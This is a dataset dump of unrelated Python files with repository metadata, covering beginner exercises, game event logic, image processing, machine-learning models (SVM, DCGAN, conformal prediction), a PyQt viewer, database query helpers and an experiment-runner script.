n1 = int(input('Digite um número: '))
d = n1 * 2  # double
t = n1 * 3  # triple
r = n1 ** (1/2)  # square root
print('O dobro de {0} é {1}, o triplo é {2} e a raiz quadradda é {3}.'.format(n1, d, t, r))
| true |
a8a9739fafabbabeba3626b5c3ea8bae38188f24 | Python | daxingyou/test-2 | /app/business/question.py | UTF-8 | 3,560 | 2.53125 | 3 | [] | no_license | #coding:utf8
"""
Created on 2015-12-23
@Author: jiangtaoran(jiangtaoran@ice-time.cn)
@Brief : 问答随机事件逻辑
"""
from utils import logger
from utils import utils
from datalib.data_loader import data_loader
from app.data.node import NodeInfo
from app.business import hero as hero_business
from app.business import item as item_business
from app import log_formater
def arise_question_event(data, node, now, **kwargs):
    """Trigger a Q&A random event on *node* and flag it on the map.

    Returns False when the node refuses the event (node decides, e.g. if
    another event is already attached).
    """
    if not node.arise_event(NodeInfo.EVENT_TYPE_QUESTION, now):
        return False
    map = data.map.get()
    map.update_for_question_event()
    return True
def clear_question_event(data, node, now, **kwargs):
    """Clear the Q&A event currently attached to *node*.

    The node must carry a valid question event; otherwise a warning is
    logged and False is returned.
    """
    # The node must carry a valid question random event.
    if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
        logger.warning("Wrong event[type=%d]" % node.event_type)
        return False
    question = data.question.get()
    question.finish()
    return node.clear_event()
def start_question_event(data, node, now):
    """Launch the Q&A event attached to *node*.

    Returns:
        True/False
    """
    # The node must carry a valid question random event.
    if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
        logger.warning("Wrong event[type=%d]" % node.event_type)
        return False
    if not node.launch_event(now):
        return False
    question = data.question.get()
    question.start(node, now)
    return True
def finish_question_event(data, node, question_id, answer, correct, now):
    """Finish the Q&A event on *node*, granting rewards for a correct answer.

    Args:
        data: player session data bundle.
        node[NodeInfo]: node carrying the event.
        question_id[int]: question id.
        answer[list(int)]: submitted answer.
        correct[bool]: client-reported correctness, re-checked server-side.
        now[int]: current timestamp.
    Returns:
        True/False
    """
    # The node must carry a valid question random event.
    if node.event_type != NodeInfo.EVENT_TYPE_QUESTION:
        logger.warning("Wrong event[type=%d]" % node.event_type)
        return False
    if not node.is_event_launched():
        logger.warning("Lucky event not launched")
        return False
    # Finish the Q&A flow; reject if the client's 'correct' claim disagrees
    # with the server-side answer check.
    question = data.question.get()
    if correct != question.answer(question_id, answer):
        logger.warning("Answer check error")
        return False
    question.finish()
    if correct:
        # Correct answer: grant the configured rewards (hero, items).
        hero_basic_id = data_loader.EventQuestionBasicInfo_dict[question_id].heroBasicId
        items_basic_id = data_loader.EventQuestionBasicInfo_dict[question_id].itemBasicId
        items_num = data_loader.EventQuestionBasicInfo_dict[question_id].itemNum
        assert len(items_basic_id) == len(items_num)
        item_info = []
        for i in range(0, len(items_basic_id)):
            item_info.append((items_basic_id[i], items_num[i]))
        if hero_basic_id != 0 and not hero_business.gain_hero(data, hero_basic_id):
            return False
        if len(item_info) > 0 and not item_business.gain_item(data, item_info, " question reward", log_formater.QUESTION_REWARD):
            return False
        # Correct answer also yields achievement points, scaled by level.
        user = data.user.get(True)
        resource = data.resource.get()
        resource.update_current_resource(now)
        ac_base = data_loader.LuckyEventBasicInfo_dict[node.event_type].achievementBase
        ac_coe = data_loader.LuckyEventBasicInfo_dict[node.event_type].achievementCoefficient
        achievement = ac_base + ac_coe * user.level
        resource.gain_achievement(achievement)
    return node.finish_event(now)
| true |
7498c8229e0295a2dfc24adf95b6eea29c1884c1 | Python | mamerisawesome/oneeighty_container | /180_1.py | UTF-8 | 3,994 | 3.28125 | 3 | [] | no_license | import time
import random as rand
final_sum = 0
def get_random_int ():
    """Return a uniform random integer in [0, 10**6]."""
    upper_bound = 10 ** 6
    return rand.randint(0, upper_bound)
def generate_matrix (n):
    """Build an n x n matrix (list of row lists) of random integers."""
    return [[get_random_int() for _ in range(n)] for _ in range(n)]
def v_func (matrix, y):
    """Return the sum of column *y* of *matrix*.

    Bug fix: the original guard ``if (i < x): break`` fired on the very
    first iteration (i == 0 < x), so the loop never ran and the function
    always returned 0. The unused ``output`` list is dropped as well.
    """
    return sum(row[y] for row in matrix)
def column_sum (matrix, m, n):
    """Return the sums of columns 0..n-1 of *matrix* (*m* is unused)."""
    return [v_func(matrix, column) for column in range(n)]
def break_matrix (matrix, t):
    '''
    Split an n x n matrix into t column-wise sub-matrices.

    Example: a 4x4 matrix with t == 2 yields two 4x2 matrices:
        [[1, 2, 3, 1],           [[1, 2],      [[3, 1],
         [4, 5, 6, 1],     ->     [4, 5],       [6, 1],
         [7, 8, 9, 1],            [7, 8],       [9, 1],
         [5, 4, 6, 1]]            [5, 4]]       [6, 1]]

    If n is not divisible by t the matrix cannot be subdivided evenly, so
    it is returned whole as a single-element list.
    '''
    # Bug fixes: the original body was an accidental paste of the whole
    # module (nested copies of every function) and implicitly returned
    # None; its divisibility guard was also inverted (warned on n % t == 0).
    n = len(matrix)
    if n % t != 0:
        print('[WARN]\tCannot subdivide matrix')
        return [matrix]
    chunk = n // t
    output = []
    for start in range(0, n, chunk):
        output.append([row[start:start + chunk] for row in matrix])
    return output
def lab01 ():
    # Sequential benchmark: build an n x n random matrix, print every
    # element, and time column_sum over it. Python 2 code (print statement,
    # raw_input, time.clock); returns the elapsed time in seconds.
    n = int(raw_input("Enter size of square matrix\t\t>> "))
    matrix = generate_matrix(n)
    for i in range(0, len(matrix)):
        for j in range(0, len(matrix)):
            print '[*]' + str(matrix[j][i])
    s_time = time.clock()
    column_sum(matrix, n, n)
    e_time = time.clock()
    return e_time - s_time
def lab02 ():
    # Threaded benchmark skeleton: the threaded column_sum logic was never
    # implemented, so nothing is timed and the function returns None.
    n = int(raw_input("Enter size of square matrix\t\t>> "))
    t = int(raw_input("Enter number of threads to be used\t>> "))
    v = []
    matrix = generate_matrix(n)
    s_time = time.clock()
    # insert column_sum logic here
    e_time = time.clock()
    return
print lab01()
print lab02()
| true |
005775540241583013415c99410713b5d7c9ccce | Python | taowenyin/HelloCV | /opencv_example/S5/S5.1.py | UTF-8 | 1,422 | 3.140625 | 3 | [] | no_license | import cv2
import numpy as np
import matplotlib.pyplot as plt
# Edge detection demo: outline Lena with Canny and paint the edge pixels
# back onto the original image, showing every intermediate step.
if __name__ == '__main__':
    rows = 2
    columns = 3
    lena = cv2.imread('data/Lena.png')
    plt.subplot(rows, columns, 1)
    plt.title('Lena')
    plt.imshow(cv2.cvtColor(lena.copy(), cv2.COLOR_BGR2RGB))
    # Step 1: convert the image to grayscale.
    lean_gray = cv2.cvtColor(lena, cv2.COLOR_BGR2GRAY)
    plt.subplot(rows, columns, 2)
    plt.title('Lena-Gray')
    plt.imshow(cv2.cvtColor(lean_gray.copy(), cv2.COLOR_BGR2RGB))
    # Step 2: denoise with a 3x3 box blur.
    lean_blur = cv2.blur(lean_gray, (3, 3))
    plt.subplot(rows, columns, 3)
    plt.title('Lena-Blur')
    plt.imshow(cv2.cvtColor(lean_blur.copy(), cv2.COLOR_BGR2RGB))
    # Step 3: Canny edge detection with hysteresis thresholds 30/80.
    lean_canny = cv2.Canny(lean_blur, 30, 80, apertureSize=3)
    plt.subplot(rows, columns, 4)
    plt.title('Lena-Canny')
    plt.imshow(cv2.cvtColor(lean_canny.copy(), cv2.COLOR_BGR2RGB))
    # Step 4: invert the edge map to use it as a mask.
    canny_mask = cv2.bitwise_not(lean_canny.copy())
    plt.subplot(rows, columns, 5)
    plt.title('Lena-Mask')
    plt.imshow(cv2.cvtColor(canny_mask.copy(), cv2.COLOR_BGR2RGB))
    # Step 5: copy the original through the mask, leaving edges blank.
    dst = cv2.copyTo(lena, canny_mask)
    plt.subplot(rows, columns, 6)
    plt.title('Lena-Dst')
    plt.imshow(cv2.cvtColor(dst.copy(), cv2.COLOR_BGR2RGB))
    plt.show()
56fe9d264fa3f34fd376747407d112656420bf68 | Python | huytr225/workload | /poisson/poisson.py | UTF-8 | 404 | 2.515625 | 3 | [] | no_license | import statsmodels.api as sm
import statsmodels.formula.api as smf
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# Load R's 'discoveries' dataset (yearly counts of great discoveries).
dataset = sm.datasets.get_rdataset("discoveries")
df = dataset.data.set_index("time")
df.head(10).T  # NOTE(review): result is discarded -- notebook leftover?
fig, ax = plt.subplots(1, 1, figsize=(16, 4))
df.plot(kind='bar', ax=ax)
# Intercept-only Poisson regression: discoveries ~ 1.
model = smf.poisson("discoveries ~ 1", data=df)
result = model.fit()
print(result.summary())
| true |
daada6e38258b9d6b9f4ecf91a30794bf27cc735 | Python | alexBDG/QuidEst | /Displayers/ImagePlayer.py | UTF-8 | 3,760 | 2.5625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 9 11:15:47 2020
@author: Alexandre Banon
"""
import sys
from PIL.ImageQt import ImageQt
from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog, QGraphicsScene
from PyQt5.QtWidgets import QToolButton, QVBoxLayout, QGraphicsView, QStatusBar
from PyQt5.QtCore import Qt, QDir
from PyQt5.QtGui import QPixmap, QFont
class ImagePlayer(QWidget):
    """Zoomable/pannable image viewer widget.

    Run standalone it opens its own window with a file-picker button;
    embedded, it lays itself out inside the given parent widget.
    """

    def __init__(self, img_path, parent=None):
        super(ImagePlayer, self).__init__(parent)
        # Standalone mode gets its own window; embedded mode adopts the
        # parent's geometry and installs the layout on the parent.
        if __name__ == '__main__':
            self.setWindowTitle("Viewer")
            self.setGeometry(0, 0, 640, 480)
            self.main = QWidget()
        else:
            self.setGeometry(0, 0, parent.width(), parent.height())
            self.main = parent

        self.vue = QGraphicsView()
        self.vue.setDragMode(QGraphicsView.ScrollHandDrag)
        # Route wheel events to our zoom handler.
        self.vue.wheelEvent = self.wheel_event

        self.statusBar = QStatusBar()
        self.statusBar.setFont(QFont("Noto Sans", 7))
        self.statusBar.setFixedHeight(14)

        self.verticalLayout = QVBoxLayout()
        self.verticalLayout.addWidget(self.vue)
        self.verticalLayout.addWidget(self.statusBar)

        self.setPixmapView(img_path)
        self.statusBar.showMessage(img_path)

        if __name__ == '__main__':
            self.image_btn = QToolButton()
            self.image_btn.setText("Image")
            self.image_btn.setObjectName("image_btn")
            self.image_btn.clicked.connect(self.get_image)
            self.verticalLayout.addWidget(self.image_btn)
            self.setLayout(self.verticalLayout)
            self.show()
        else:
            self.main.setLayout(self.verticalLayout)

    def get_image(self):
        # Open a file dialog; on cancel, record the fact and keep the
        # current image.
        img, _p = QFileDialog.getOpenFileName(self,
                                              "Ouvrir un fichier",
                                              QDir.homePath(),
                                              "All Files *.* ;; PNG *.png ;; JPG *.jpg ;; BMP *.bmp")
        if not img:
            with open("img.txt","w") as file:
                file.write("not img")
            return
        self.setPixmapView(img)

    def setPixmapView(self, img_path):
        # Load the file and scale it to the current widget size, keeping
        # the aspect ratio.
        self.current_image = ImageQt(img_path)
        w, h = self.size().width(), self.size().height()
        self.pixmap = QPixmap.fromImage(self.current_image.scaled(w, h,
                                                                  Qt.KeepAspectRatio,
                                                                  Qt.FastTransformation))
        self.view_current()
        self.statusBar.showMessage(img_path)

    def view_current(self):
        # Rebuild the scene so its rect matches the (possibly rescaled)
        # pixmap exactly.
        w_pix, h_pix = self.pixmap.width(), self.pixmap.height()
        self.scene = QGraphicsScene()
        self.scene.setSceneRect(0, 0, w_pix, h_pix)
        self.scene.addPixmap(self.pixmap)
        self.vue.setScene(self.scene)

    def wheel_event(self, event):
        # One wheel notch = 120 units -> one zoom step.
        steps = event.angleDelta().y() / 120.0
        self.zoom(steps)
        event.accept()

    def zoom(self, step):
        # Rescale from the pristine source image by +/-10% per step, so
        # repeated zooming does not accumulate resampling artifacts.
        w_pix, h_pix = self.pixmap.width(), self.pixmap.height()
        w, h = w_pix * (1 + 0.1*step), h_pix * (1 + 0.1*step)
        self.pixmap = QPixmap.fromImage(self.current_image.scaled(w, h,
                                                                  Qt.KeepAspectRatio,
                                                                  Qt.FastTransformation))
        self.view_current()
if __name__ == "__main__":
    # Standalone demo: open the sample photo in its own viewer window.
    app = QApplication(sys.argv)
    viewer = ImagePlayer("..\\ressources\\DSC_0506.JPG")
    sys.exit(app.exec_())
d9c540f3e3c710cb31cf607f44392e02adbd0fcd | Python | tigerpk86/python_data__visual | /test.py | UTF-8 | 245 | 3.34375 | 3 | [] | no_license | #!__*__coding:utf-8__*__
import decimal
for i in range(1,10) :
for j in range(1,10) :
#print(i, "x", j, "=", i*j, end = ". ");
print("%2d x%2d =%2d" % (j, i, i * j), end=", ");
#print(i * j, end=" ");
print("");
| true |
98d0513e7f246939db810c06dd82858fa3bbe0df | Python | TeodorStefanPintea/Sentiment-mining-of-the-bioinformatics-literature | /trainedClassifier.py | UTF-8 | 1,272 | 3.015625 | 3 | [] | no_license | '''
This is a classifier which was trained on a movie review data set and applied in the bioinformatics domain.
'''
import pandas as pd
import random
from nltk import word_tokenize
from nltk.sentiment.util import mark_negation
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.base import TransformerMixin
# Load the IMDB movie-review training set (tab-separated, quoting disabled).
data = pd.read_csv("labeledTrainData.tsv", header=0, delimiter="\t", quoting=3)
# 25000 movie reviews in data
sentiment_data = list(zip(data["review"], data["sentiment"]))
random.shuffle(sentiment_data)
# 80% for training
train_X, train_y = zip(*sentiment_data[:20000])
# Keep 20% for testing
test_X, test_y = zip(*sentiment_data[20000:])
# Unigram+bigram bag-of-words features into a linear SVM; HTML line breaks
# are stripped before tokenization.
unigram_bigram_clf = Pipeline([
    ('vectorizer', CountVectorizer(analyzer="word",
                                   ngram_range=(1, 2),
                                   tokenizer=word_tokenize,
                                   # tokenizer=lambda text: mark_negation(word_tokenize(text)),
                                   preprocessor=lambda text: text.replace("<br />", " "),)),
    ('classifier', LinearSVC())
])
#unigram_bigram_clf.fit(train_X, train_y)
#print(unigram_bigram_clf.score(test_X, test_y))
| true |
5a8f0bbfed486bd36daab5f8e5e93d4159930c15 | Python | jmv74211/Redes_neuronales | /src/plot_result.py | UTF-8 | 1,132 | 2.53125 | 3 | [] | no_license | import numpy as np
from matplotlib import pyplot as plt
num_epocs = 30
#file='./results/multilayer_perceptron/multilayer_perceptron_' + repr(num_epocs) + 'e.txt'
file='./results/multilayer_perceptron/training/tanh/multilayer_perceptron_128n_30e_f_tanh.txt'
epocas = np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[0])
loss= np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[1])
acc= np.loadtxt(file, delimiter='\t', skiprows=0,usecols=[2])
plt.figure()
plt.plot(epocas,acc)
plt.title("Variación de acc respecto a épocas")
plt.xlabel("Acc")
plt.ylabel("Número de épocas")
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.savefig('./results/multilayer_perceptron/training/multilayer_perceptron_' + repr(num_epocs) + 'e_acc.png')
plt.figure()
plt.plot(epocas,loss)
plt.title("Variación de loss respecto a épocas")
plt.xlabel("Loss")
plt.ylabel("Número de épocas")
manager = plt.get_current_fig_manager()
manager.resize(*manager.window.maxsize())
plt.savefig('./results/multilayer_perceptron/training/multilayer_perceptron_' + repr(num_epocs) + 'e_loss.png')
| true |
0d6952fa9b97772f3b598b744ed9f2e82ee31a38 | Python | douglasrodriguess/basic-to-advanced-python-course | /13-reading-and-writing-in-files/code/VideoLesson92_filesmode.py | UTF-8 | 1,720 | 4.09375 | 4 | [] | no_license | """
Modos de abertura de arquivo
'x' -> abre para escrita somente se o arquivo não existir. Caso exista, retorna um FileExistsError
'a' -> o conteudo é adicionado sempre no final do arquivo
'+' -> abre para a atualização, seja de leitura ou escrita
'r+' ou 'w+' -> há o controle do cursor
link: https://docs.python.org/3/library/functions.html#open
"""
print("\n - Modo de abertura 'w'")
with open('frutas.txt', 'w') as file:
try:
while True:
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
print("\n - Modo de abertura 'a'")
with open('frutas.txt', 'a') as file:
try:
while True:
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
print("\n - Modo de abertura 'r+'")
with open('frutas.txt', 'r+') as file:
try:
while True:
file.seek(24)
frutas = input("Digite uma fruta ou a palavra 'sair': ")
if frutas != 'sair':
file.write(frutas + '\n')
else:
break
except TypeError:
print("A funcao recebe apenas string como parametro")
with open('frutas.txt') as file:
print(file.read())
file.close()
| true |
5ff98e837692803c28bb3f6b39dd6fc542c856e0 | Python | JakeOh/201908_itw_bdml11 | /lab-python/lec01/ex09.py | UTF-8 | 1,025 | 4.375 | 4 | [] | no_license | """
dict: key-value의 쌍으로 이루어진 데이터들을 저장하는
사전(dictionary)식 데이터 타입
"""
person = {'name': '오쌤', 'age': 16, 'height': 170.5}
print(person)
print(type(person))
# dict의 데이터 참조 - key를 사용
print(person['name'])
print(person['age'])
print(person.keys()) # dict의 key를 알아낼 때
print(person.values()) # dict의 value들만 알아낼 때
print(person.items()) # (key, value)를 알아낼 때
students = {1: '강다혜', 2: '김수인', 3: '김영광', 10: '안도연'}
print(students[1])
# dict에 값을 추가
students[4] = '김재성'
print(students)
# dict의 값을 변경
students[4] = 'gildong'
print(students)
# dict의 값을 삭제 - pop(key) 메소드 사용
students.pop(4)
print(students)
book = {
'title': '파이썬 프로그래밍 교과서',
'authors': ['제니퍼', '폴', '제이슨'],
'company': '길벗',
'isbn': 97911
}
print(book['authors'])
print(book['authors'][0])
| true |
251b8f31ba431212762be5e149888d1f88f55257 | Python | f-fathurrahman/ffr-MetodeNumerik | /matplotlib01/matplotlib/ex_plot_sin_01.py | UTF-8 | 453 | 2.984375 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(0.0, 1.0, 200)
Δt = 0.1
A = 1.0
λ = 0.5
f = 2.0
k = -2*np.pi/λ
ω = 2*np.pi*f
t0 = 0.0
fig, ax = plt.subplots()
# ax and fig will be reused
for i in range(20):
t = t0 + Δt*i
y = A*np.sin(k*x - ω*t)
# First plot
ax.cla()
ax.plot(x, y)
ax.grid(True)
ax.set_xlim(0.0, 1.0)
ax.set_xlabel("x")
fig.savefig("IMG_sin_" + str(i) + ".png", dpi=150)
| true |
e833e69c106f07c9af27615658d0dc0145fbc37d | Python | hatan4ik/python-3-keys-study | /solutions/person.py | UTF-8 | 255 | 3.421875 | 3 | [] | no_license | class Person:
def __init__(self, first, last):
self.first = first
self.last = last
def full_name(self):
return self.first + " " + self.last
def formal_name(self, title):
return title + " " + self.full_name()
| true |
f5fea182f379b2675d938bdf6140a6eab8e4f8f9 | Python | wunengguang/cp-cnn-mutilabel | /PT.py | UTF-8 | 4,571 | 2.515625 | 3 | [] | no_license | import numpy as np
import copy
import os
from conformpredict import MLCP
class TPMLCP(MLCP):
    """Multi-label conformal predictor using a 1/(p + r) nonconformity score."""

    def __init__(self,numInstance,path,numclasses=14,count=0,anum=0):
        '''
        :param numInstance: number of instances
        :param numclasses: number of label classes

        NOTE(review): the base initializer is called with the literal
        defaults (numclasses=14, count=0, anum=0) instead of forwarding
        the caller's arguments -- confirm this is intentional.
        '''
        MLCP.__init__(self,numInstance,path,numclasses=14,count=0,anum=0)

    def conformist(self,test_y,regression,r):
        '''
        Compute the nonconformity score of every calibration example.

        :param test_y: true labels per class, test_y[j][i] in {0, 1}
        :param regression: predicted probabilities per class (list)
        :param r: per-class network sensitivity offsets
        :return: (a1socre, a0socre) -- nonconformity scores for the
            positive-label and negative-label examples of each class
        '''
        a =copy.deepcopy(regression)
        a1socre=[]
        a0socre=[]
        for j in range(self.numclasses):
            a1=[]
            a0=[]
            for i in range(len(regression[0])):
                if test_y[j][i]==1:
                    # Positive example: score shrinks as the predicted
                    # probability of the true side grows.
                    if regression[j][i]>0.5:
                        a[j][i] = 1 / (regression[j][i]+r[j])
                        a1.append(a[j][i])
                    else:
                        a[j][i] = 1 / (1 - regression[j][i]+r[j])
                        a1.append(a[j][i])
                else:
                    # Negative example: mirror image of the rule above.
                    if regression[j][i]<0.5:
                        a[j][i] = 1 / (1-regression[j][i]+r[j])
                        # a[j][i] = 1 / (regression[j][i]+r[j])
                        a0.append(a[j][i])
                    else:
                        a[j][i] = 1 / (regression[j][i] + r[j])
                        #a[j][i] = 1 / (1-regression[j][i]+r[j])
                        a0.append(a[j][i])
            a1socre.append(np.array(a1))
            a0socre.append(np.array(a0))
        return a1socre,a0socre
    # Nonconformity mapping for the assumed label (y = 1 or y = 0).
    def evconformist(self,test_y,regression,r):
        '''
        Score every test example under the assumed label *test_y*.

        :param test_y: assumed label for all examples
        :param regression: predicted probabilities per class
        :param r: per-class sensitivity offsets
        :return: nonconformity scores, same shape as *regression*

        NOTE(review): ``test_y`` is passed in as a list of arrays by
        prediction1(), so ``test_y==1`` is always False and only the else
        branch ever runs -- confirm whether ``test_y[j][i]`` was intended.
        '''
        a = copy.deepcopy(regression)
        for j in range(self.numclasses):
            for i in range(len(regression[0])):
                if test_y==1:
                    if regression[j][i] > 0.5:
                        a[j][i] = 1 / (regression[j][i] + r[j])
                    else:
                        a[j][i] = 1 / (1 - regression[j][i] + r[j])
                else:
                    if regression[j][i] < 0.5:
                        a[j][i] = 1 / (1 - regression[j][i] + r[j])
                    else:
                        a[j][i] = 1 / (regression[j][i] + r[j])
        return a

    def prediction1(self, a_y,a_regression,test_y, testregression,signficace, r):
        '''
        Run conformal prediction on the test set and write point predictions.

        :param a_y: calibration labels
        :param a_regression: calibration probabilities
        :param test_y: true test labels (for significance evaluation)
        :param testregression: test probabilities (list)
        :param signficace: significance level
        :param r: per-class network sensitivity offsets
        :return: (lastpredict, accuary, truearray, nosurerate, nonearray)
        '''
        lastpredictpath = os.path.join(self.path, "Ptlastvalue")
        testnum = len(testregression[0])
        devnum = len(a_regression[0])
        onearray = np.ones((testnum,1))
        zerosarray =np.zeros((testnum,1))
        # Enumerate both candidate labels (all-ones / all-zeros) per class.
        test_Y_zero = []
        test_y_one = []
        test_other_regression = []
        for i in range(self.numclasses):
            test_y_one.append(onearray)
            test_Y_zero.append(zerosarray)
            test_other_regression.append(onearray-testregression[i])
        # Compute all nonconformity scores.
        # NOTE(review): '{r}'.format(r) raises KeyError at runtime -- the
        # format call passes a positional argument for a named field.
        print('pt的值{r}'.format(r))
        a1socre,a0socre = self.conformist(a_y,a_regression,r)# calibration scores
        y_one_ascore = self.evconformist(test_y_one,testregression,r)
        y_zero_ascore = self.evconformist(test_Y_zero,testregression,r)# scores assuming label 0
        # Initialise the final point prediction.
        initlastpredict=copy.deepcopy(testregression)
        # Compute p-values and predict.
        lastpredict,p1tvalue,p0tvalue = super(TPMLCP,self).pvalue(a1socre,a0socre,initlastpredict,y_one_ascore,y_zero_ascore,
                                                                  testregression,test_other_regression)
        accuary,truearray ,nosurerate,nonearray= super(TPMLCP,self).signficance(p1tvalue,p0tvalue,test_y,signficace)
        # Write the cp-mcnn point predictions to disk, one class per line.
        with open(lastpredictpath, 'w') as flie:
            for i in range(self.numclasses):  # one line per class
                flie.write('第%d类:' % i)
                for j in range(len(lastpredict[i])):  # every element of the class
                    flie.write(str(lastpredict[i][j]))
                flie.write("\n")
        return lastpredict,accuary, truearray,nosurerate,nonearray
| true |
490594e7d2cace57ffeb2be2c5481990310ffa3c | Python | gregunz/TorchTools | /torch_tools/models/vision/gans/dcgan.py | UTF-8 | 2,990 | 2.703125 | 3 | [
"MIT"
] | permissive | from argparse import ArgumentParser
from torch import nn
from torch_tools.models.util import GAN, FISModel
from torch_tools.models.vision.util import DCDecoder, DCEncoder
_ld = 128 # default latent_dim
_nf = 64 # default n_filters
_np = 4 # default n_pyramid
_wi = True # default use_custom_weight_init
class DCGAN(GAN, FISModel):
    """
    DCGAN Implementation <https://arxiv.org/abs/1511.06434>

    Args:
        latent_dim: size of the dimension of the latent vector (latent_dim x 1 x 1) used for generator input.
        in_channels: number of channels of the generated images.
        n_filters: number of filters (kernels) used in the first `PyramidBlock`, then it grows exponentially
            with the number of `PyramidBlock` blocks. It controls the capacity of the model.
        n_pyramid: number of pyramid blocks, it is related to the image size (H x W). Input image must be
            squared (H = W) and powers of 2 starting at 8. `n_pyramid = log_2(H / 8)`.
        use_custom_weight_init: whether to use the weight initialization proposed in the paper.
    """

    def __init__(self, in_channels, latent_dim=_ld, n_filters=_nf, n_pyramid=_np, use_custom_weight_init=_wi,
                 **kwargs):
        super().__init__(input_size=(latent_dim, 1, 1))
        # Generator maps the latent vector up to an image...
        self._generator = DCDecoder(
            out_channels=in_channels,
            latent_channels=latent_dim,
            n_filters=n_filters,
            n_pyramid=n_pyramid,
        )
        # ...and the discriminator maps an image down to one logit.
        self._discriminator = DCEncoder(
            in_channels=in_channels,
            latent_channels=1,  # binary output (real/fake)
            n_filters=n_filters,
            n_pyramid=n_pyramid,
        )
        self.latent_dim = latent_dim
        # Generated image side length: 8 * 2**(n_pyramid - 1) = 2**(n_pyramid + 2).
        h = 2 ** (n_pyramid + 2)
        self.image_size = (in_channels, h, h)
        if use_custom_weight_init:
            self.apply(self.weights_init)

    @property
    def generator(self) -> nn.Module:
        return self._generator

    @property
    def discriminator(self) -> nn.Module:
        return self._discriminator

    # custom weights initialization (DCGAN paper: N(0, 0.02) for conv
    # layers, N(1, 0.02) with zero bias for batch-norm layers)
    @staticmethod
    def weights_init(module):
        classname = module.__class__.__name__
        if classname.find('Conv') != -1:
            module.weight.data.normal_(0.0, 0.02)
        elif classname.find('BatchNorm') != -1:
            module.weight.data.normal_(1.0, 0.02)
            module.bias.data.fill_(0)

    @staticmethod
    def add_argz(parser: ArgumentParser):
        # Registers this model's hyperparameters on the CLI parser.
        parser.add_argument('--latent_dim', type=int, default=_ld, help=f'latent dim')
        parser.add_argument('--n_pyramid', type=int, default=_np, help=f'number of pyramid blocks')
        parser.add_argument('--n_filters', type=int, default=_nf, help=f'num of filters for the 1st pyramid block')
        parser.add_argument('--no_custom_weight_init', action='store_false', default=not _nf,
                            help=f'use this flag for not using the weight initialization proposed in the paper')
| true |
a704f816966b52bc4ce8a27fe9059eab5a812b40 | Python | dty999/pythonLearnCode | /挑战python/095数字序列.py | UTF-8 | 191 | 3 | 3 | [] | no_license | """数字序列定义如下:
f(1) = 1, f(2) = 1, f(n) = (A * f(n - 1) + B * f(n - 2)) % 7.
现在给你A,B和n(1 <= A,B <= 1000, 1 <= n <= 1000000000),请你计算f(n)的值。""" | true |
528da5c372ab17f11cf43fff2df2638bbdad4069 | Python | avagut/mheshimiwa-api | /api_files/utils.py | UTF-8 | 3,874 | 2.515625 | 3 | [
"MIT"
] | permissive | """Mheshimiwa api helper functions."""
from .app import api, db, app
from .models import Constituency, County, Representative
from sqlalchemy import func
def fetch_all_constituencies():
"""Get complete list of constituencies."""
constituency_list = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency).all()
return constituency_list
def fetch_all_county_constituencies(county_name):
"""Get complete list of constituencies in a county."""
selected_county_name = county_name.replace("+", " ")
constituency_list = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency) \
.filter(func.lower(Constituency.county) ==
func.lower(selected_county_name)).all()
return constituency_list
def fetch_specific_constituency(constituency):
"""Fetch the details of select constituency."""
selected_const = constituency.replace("+", " ")
constituency = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency) \
.filter(func.lower(Constituency.constituency_name) ==
func.lower(selected_const)).all()
return constituency
def fetch_specific_county(county_name):
"""Fetch the details of select constituency."""
selected_county_name = county_name.replace("+", " ")
county = db.session.query(County.county_number, \
County.county, \
County.capital, \
County.area, \
Representative.representative, \
Representative.party) \
.join(Representative, County.county == Representative.county) \
.filter(Representative.is_senate == bool(1)) \
.filter(func.lower(County.county)== func.lower(selected_county_name)) \
.order_by(County.order_col).all()
return county
def fetch_all_counties():
"""Get complete list of counties."""
county_list = db.session.query(County.county_number, \
County.county, \
County.capital, \
County.area, \
Representative.representative, \
Representative.party) \
.join(Representative, County.county == Representative.county) \
.filter(Representative.is_senate == bool(1))\
.order_by(County.order_col).all()
return county_list
def validate_this_county(this_county):
"""Validate provided county name."""
county = fetch_specific_county(this_county)
if not county:
return None
else:
county = county[0]
constituencies = Constituency.query.filter(func.lower(
Constituency.county) == func.lower(county.county)).all()
return constituencies | true |
9c3625b2674cb0996593f0081bb496d8ac8f0aa1 | Python | tsinghua-fib-lab/MAG-Customer-Value-Prediction | /EPD/run_exp.py | UTF-8 | 991 | 2.671875 | 3 | [] | no_license | import os
import time
import argparse
def run_experiments(cmd):
for command in cmd:
rty_flag = 1
retry = 0
while rty_flag != 0:
rty_flag = os.system(command)
rty_flag >>= 8
time.sleep(3)
retry += 1
if retry >= 3:
print(' -------------- Command failed -------------- ')
print(command)
return 0
return 0
def get_experiments(path):
cmd = []
with open(path, 'r') as file:
for line in file:
if len(line) > 5:
cmd.append(line.strip())
return cmd
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Experiments')
parser.add_argument('-p', '--config_path', type=str,
default='./exp_config/xxx', help='config path')
args = parser.parse_args()
cmd = get_experiments(args.config_path)
run_experiments(cmd) | true |
